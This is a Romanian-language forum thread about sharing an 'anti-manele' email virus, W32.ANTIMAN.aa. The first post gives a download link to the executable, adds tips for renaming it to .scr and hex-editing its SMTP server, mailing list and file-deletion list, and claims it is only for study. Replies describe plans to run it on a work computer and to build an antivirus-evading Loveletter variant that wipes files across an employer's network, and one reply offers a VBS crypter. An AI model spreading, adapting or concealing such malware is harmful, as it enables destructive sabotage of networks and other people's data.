Jump to content
puskin

Virusul antimanele

Recommended Posts

Posted

O sa postez mai jos virusul antimanele W32.ANTIMAN.aa doar pt. studiu...

Am si codul sursa in pascal dar nu il voi posta din motive de securitate.

Oricum este usor de obtinut cu un decompiler delphi....se poate modifica si in HEX pt. cunoscatori(se poate schimba SMTP-ul, Lista de mesaje email, lista de definitie a string-urilor de sters...s.a.m.d

http://rapidshare.com/files/116624401/funny.exe.html

Se poate redenumi .scr merge in ambele moduri...

Este o versiune veche...are multe "bug-uri".....

Posted

ce motive de securitate? Lasa ca e bun asa, cat l-am cautat candva, acu iar il pierdusem. Asta il instalez cu toata placerea pe comp la servici.

Ca mi-ai adus aminte de o versiune de loveletter modificata si putin imbunatatita cat sa nu se raspandeasca in afara intranetului si sa nu fie detectata de antivirusi. Sa dau de ea si bag tutorial. Scopul: sa stearga o lista de tipuri si nume de fisiere dintr-o retea. Util pentru demisii gen "nimeni de neinlocuit".

Posted
ce motive de securitate? Lasa ca e bun asa, cat l-am cautat candva, acu iar il pierdusem. Asta il instalez cu toata placerea pe comp la servici.

Ca mi-ai adus aminte de o versiune de loveletter modificata si putin imbunatatita cat sa nu se raspandeasca in afara intranetului si sa nu fie detectata de antivirusi. Sa dau de ea si bag tutorial. Scopul: sa stearga o lista de tipuri si nume de fisiere dintr-o retea. Util pentru demisii gen "nimeni de neinlocuit".

interesant....chiar astept sa vad cum o modifici si chiar astept sa vad ce "spreading engine" ii bagi ca cel vechi e detectat ....am lucrat acum vreo 4-5 ani cu vbs-ul, daca iti iese o sa-ti dau un criptor pt vbs fain